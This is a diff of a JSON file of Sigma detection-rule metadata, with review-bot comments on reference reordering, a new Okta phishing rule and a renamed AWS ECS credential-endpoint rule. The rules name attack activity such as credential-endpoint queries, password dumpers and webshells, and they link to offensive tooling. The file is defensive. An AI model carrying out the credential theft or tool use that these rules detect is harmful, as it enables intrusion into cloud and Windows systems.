+ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
"https://twitter.com/gbti_sa/status/1249653895900602375?lang=en",
+ "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_powertool.yml"
],
"tags": [
@@ -78058,8 +74619,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/felixw3000/status/853354851128025088",
"https://twitter.com/rikvduijn/status/853251879320662017",
+ "https://twitter.com/felixw3000/status/853354851128025088",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml"
],
"tags": [
@@ -78092,9 +74653,9 @@
"logsource.category": "antivirus",
"logsource.product": "No established product",
"refs": [
- "https://www.nextron-systems.com/?s=antivirus",
- "https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448",
"https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619",
+ "https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448",
+ "https://www.nextron-systems.com/?s=antivirus",
"https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_password_dumper.yml"
],
"tags": [
@@ -78152,8 +74713,8 @@
"logsource.product": "No established product",
"refs": [
"https://twitter.com/mvelazco/status/1410291741241102338",
- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675",
+ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527",
"https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_printernightmare_cve_2021_34527.yml"
],
"tags": [
@@ -78220,8 +74781,8 @@
"logsource.product": "No established product",
"refs": [
"https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797",
- "https://www.nextron-systems.com/?s=antivirus",
"https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424",
+ "https://www.nextron-systems.com/?s=antivirus",
"https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466",
"https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_exploiting.yml"
],
@@ -78264,8 +74825,8 @@
"logsource.category": "antivirus",
"logsource.product": "No established product",
"refs": [
- "https://www.nextron-systems.com/?s=antivirus",
"https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/",
+ "https://www.nextron-systems.com/?s=antivirus",
"https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_hacktool.yml"
],
"tags": [
@@ -78298,16 +74859,16 @@
"logsource.category": "antivirus",
"logsource.product": "No established product",
"refs": [
- "https://www.nextron-systems.com/?s=antivirus",
- "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection",
- "https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection",
+ "https://github.com/tennc/webshell",
"https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection",
- "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection",
"https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection",
- "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection",
+ "https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection",
"https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection",
"https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection",
- "https://github.com/tennc/webshell",
+ "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection",
+ "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection",
+ "https://www.nextron-systems.com/?s=antivirus",
+ "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection",
"https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_webshell.yml"
],
"tags": [
@@ -78340,12 +74901,12 @@
"logsource.category": "antivirus",
"logsource.product": "No established product",
"refs": [
- "https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045",
- "https://www.nextron-systems.com/?s=antivirus",
- "https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916",
- "https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7",
- "https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d",
"https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c",
+ "https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045",
+ "https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d",
+ "https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7",
+ "https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916",
+ "https://www.nextron-systems.com/?s=antivirus",
"https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_ransomware.yml"
],
"tags": [
@@ -78409,6 +74970,41 @@
"uuid": "d84c0ded-edd7-4123-80ed-348bb3ccc4d5",
"value": "Suspicious SQL Query"
},
+ {
+ "description": "Detects when Okta FastPass prevents a known phishing site.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2023/05/07",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "okta_fastpass_phishing_detection.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "okta",
+ "refs": [
+ "https://sec.okta.com/fastpassphishingdetection",
+ "https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_fastpass_phishing_detection.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1566"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e",
+ "value": "Okta FastPass Phishing Detection"
+ },
{
"description": "Detects when an security threat is detected in Okta.",
"meta": {
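Review bot: two wording issues in this hunk come from the upstream Okta rule text and should be fixed there rather than in the generated JSON: the new "Okta FastPass Phishing Detection" element says FastPass "prevents a known phishing site", where the rule actually fires when FastPass blocks sign-in to a known phishing site, and the trailing context line for the next element reads "Detects when an security threat is detected" (should be "a security threat"). The structure of the new element itself (meta, related with dest-uuid a62a8db3-f23a-4d8f-afd6-9dbc77e7813b for attack.t1566, uuid, value) is consistent with the other additions.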
@@ -78423,8 +75019,8 @@
"logsource.product": "okta",
"refs": [
"https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm",
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml"
],
"tags": "No established tags"
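Review bot: the trailing context line "tags": "No established tags" shows a schema inconsistency that this diff leaves in place: everywhere else in the file "tags" is an array (for example the Okta element just above, and every "refs"/"tags" pair in the earlier hunks), but elements without ATT&CK tags get a bare string. A consumer that iterates over meta.tags will break or silently treat the sentence as a tag name, so the generator should emit an empty array, or omit the key, when no tags are present. The same placeholder convention appears as "No established category" and "No established product" in logsource fields, where a string is at least type-consistent.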
@@ -78445,8 +75041,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml"
],
"tags": [
@@ -78479,8 +75075,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml"
],
"tags": [
@@ -78503,8 +75099,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml"
],
"tags": [
@@ -78527,8 +75123,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml"
],
"tags": [
@@ -78551,8 +75147,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml"
],
"tags": [
@@ -78575,8 +75171,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assignment_created.yml"
],
"tags": [
@@ -78599,8 +75195,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml"
],
"tags": [
@@ -78633,8 +75229,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml"
],
"tags": [
@@ -78658,8 +75254,8 @@
"logsource.product": "okta",
"refs": [
"https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm",
- "https://developer.okta.com/docs/reference/api/system-log/",
"https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data",
+ "https://developer.okta.com/docs/reference/api/system-log/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_password_in_alternateid_field.yml"
],
"tags": [
@@ -78692,8 +75288,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml"
],
"tags": [
@@ -78716,8 +75312,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml"
],
"tags": [
@@ -78740,8 +75336,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml"
],
"tags": [
@@ -78778,8 +75374,8 @@
"logsource.category": "No established category",
"logsource.product": "okta",
"refs": [
- "https://developer.okta.com/docs/reference/api/event-types/",
"https://developer.okta.com/docs/reference/api/system-log/",
+ "https://developer.okta.com/docs/reference/api/event-types/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml"
],
"tags": [
@@ -78963,10 +75559,10 @@
"logsource.product": "m365",
"refs": [
"https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
+ "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html",
"https://o365blog.com/post/aadbackdoor/",
"https://www.sygnia.co/golden-saml-advisory",
"https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf",
- "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml"
],
"tags": [
@@ -79449,8 +76045,8 @@
"logsource.product": "github",
"refs": [
"https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions",
- "https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization",
"https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository",
+ "https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_disable_high_risk_configuration.yml"
],
"tags": [
@@ -79543,8 +76139,8 @@
"logsource.category": "No established category",
"logsource.product": "github",
"refs": [
- "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization",
"https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts",
+ "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_disabled_outdated_dependency_or_vulnerability.yml"
],
"tags": [
@@ -79674,11 +76270,11 @@
"logsource.category": "No established category",
"logsource.product": "gcp",
"refs": [
- "https://github.com/elastic/detection-rules/pull/1267",
- "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
+ "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control",
"https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole",
"https://kubernetes.io/docs/reference/access-authn-authz/rbac/",
- "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control",
+ "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
+ "https://github.com/elastic/detection-rules/pull/1267",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml"
],
"tags": [
@@ -79726,8 +76322,8 @@
"logsource.category": "No established category",
"logsource.product": "gcp",
"refs": [
- "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
"https://kubernetes.io/docs/concepts/workloads/controllers/job/",
+ "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
"https://cloud.google.com/kubernetes-engine/docs",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml"
],
@@ -79956,8 +76552,8 @@
"logsource.category": "No established category",
"logsource.product": "gcp",
"refs": [
- "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html",
"https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
+ "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml"
],
"tags": [
@@ -79991,8 +76587,8 @@
"logsource.product": "google_workspace",
"refs": [
"https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3",
- "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION",
"https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST",
+ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml"
],
"tags": [
@@ -80204,11 +76800,11 @@
"refs": [
"https://github.com/elastic/detection-rules/pull/1145/files",
"https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html",
+ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html",
"https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html",
+ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html",
"https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html",
"https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html",
- "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html",
- "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml"
],
"tags": [
@@ -80338,40 +76934,6 @@
"uuid": "a607e1fe-74bf-4440-a3ec-b059b9103157",
"value": "AWS SecurityHub Findings Evasion"
},
- {
- "description": "Detects when an Elastic Container Service (ECS) Task Definition has been modified and run.\nThis can indicate an adversary adding a backdoor to establish persistence or escalate privileges.\nThis rule is based on examining events created upon execution of Rhino Security Lab's Pacu in a lab environment.\n",
- "meta": {
- "author": "Darin Smith",
- "creation_date": "2022/06/07",
- "falsepositive": [
- "Task Definition being modified to request credentials from the Task Metadata Service for valid reasons"
- ],
- "filename": "aws_ecs_task_definition_backdoor.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "aws",
- "refs": [
- "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py",
- "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1525"
- ]
- },
- "related": [
- {
- "dest-uuid": "4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad",
- "value": "AWS ECS Backdoor Task Definition"
- },
{
"description": "Detects an instance of an SES identity being deleted via the \"DeleteIdentity\" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities",
"meta": {
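Review bot: the block deleted here, uuid b94bf91e-c2bf-4047-9c43-c6810f43baad ("AWS ECS Backdoor Task Definition"), reappears later in this patch under the same uuid with a new filename and value, so this is a rename rather than a removal and the PR description should say so. The removed description's sentence that the rule was based on events from Rhino Security Labs' Pacu is not present in the re-added version; worth checking against the upstream rule text so the galaxy does not silently lose provenance the rule still states.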
@@ -80849,9 +77411,9 @@
"logsource.category": "No established category",
"logsource.product": "aws",
"refs": [
+ "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html",
"https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/",
"https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md",
- "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_buckets.yml"
],
"tags": [
@@ -80995,6 +77557,41 @@
"uuid": "b45ab1d2-712f-4f01-a751-df3826969807",
"value": "AWS STS GetSessionToken Misuse"
},
+ {
+ "description": "Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint.\nThis can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.\n",
+ "meta": {
+ "author": "Darin Smith",
+ "creation_date": "2022/06/07",
+ "falsepositive": [
+ "Task Definition being modified to request credentials from the Task Metadata Service for valid reasons"
+ ],
+ "filename": "aws_ecs_task_definition_cred_endpoint_query.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py",
+ "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html",
+ "https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_cred_endpoint_query.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1525"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad",
+ "value": "AWS ECS Task Definition That Queries The Credential Endpoint"
+ },
{
"description": "Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.",
"meta": {
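Review bot: keeping uuid b94bf91e-c2bf-4047-9c43-c6810f43baad for the renamed rule (filename now aws_ecs_task_definition_cred_endpoint_query.yml, value "AWS ECS Task Definition That Queries The Credential Endpoint") is the right choice, since MISP galaxy consumers key on the uuid and existing tags stay attached; the changed "value" will still rename the cluster on every instance that synchronises it, so call it out in the changelog. The added ref "https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html" matches the new description's focus on the credential endpoint.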
@@ -81065,9 +77662,9 @@
"logsource.category": "No established category",
"logsource.product": "aws",
"refs": [
- "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html",
"https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html",
"https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml",
+ "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml"
],
"tags": [
@@ -81125,8 +77722,8 @@
"logsource.category": "No established category",
"logsource.product": "aws",
"refs": [
- "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/",
"https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html",
+ "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml"
],
"tags": [
@@ -82176,8 +78773,8 @@
"logsource.category": "No established category",
"logsource.product": "azure",
"refs": [
- "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml",
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
+ "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_pods_deleted.yml"
],
"tags": [
@@ -82371,10 +78968,10 @@
"logsource.product": "azure",
"refs": [
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
- "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml"
],
"tags": [
@@ -83494,10 +80091,10 @@
"logsource.product": "azure",
"refs": [
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
- "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml"
],
"tags": [
@@ -83565,10 +80162,10 @@
"logsource.product": "azure",
"refs": [
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
- "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml"
],
"tags": [
@@ -83746,10 +80343,10 @@
"logsource.product": "azure",
"refs": [
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
- "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
"https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
+ "https://attack.mitre.org/matrices/enterprise/cloud/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml"
],
"tags": [
@@ -83805,8 +80402,8 @@
"logsource.category": "No established category",
"logsource.product": "azure",
"refs": [
- "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
"https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml",
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_events_deleted.yml"
],
"tags": [
@@ -83890,10 +80487,10 @@
"logsource.category": "No established category",
"logsource.product": "azure",
"refs": [
- "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
"https://kubernetes.io/docs/concepts/workloads/controllers/job/",
"https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
+ "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml"
],
"tags": [
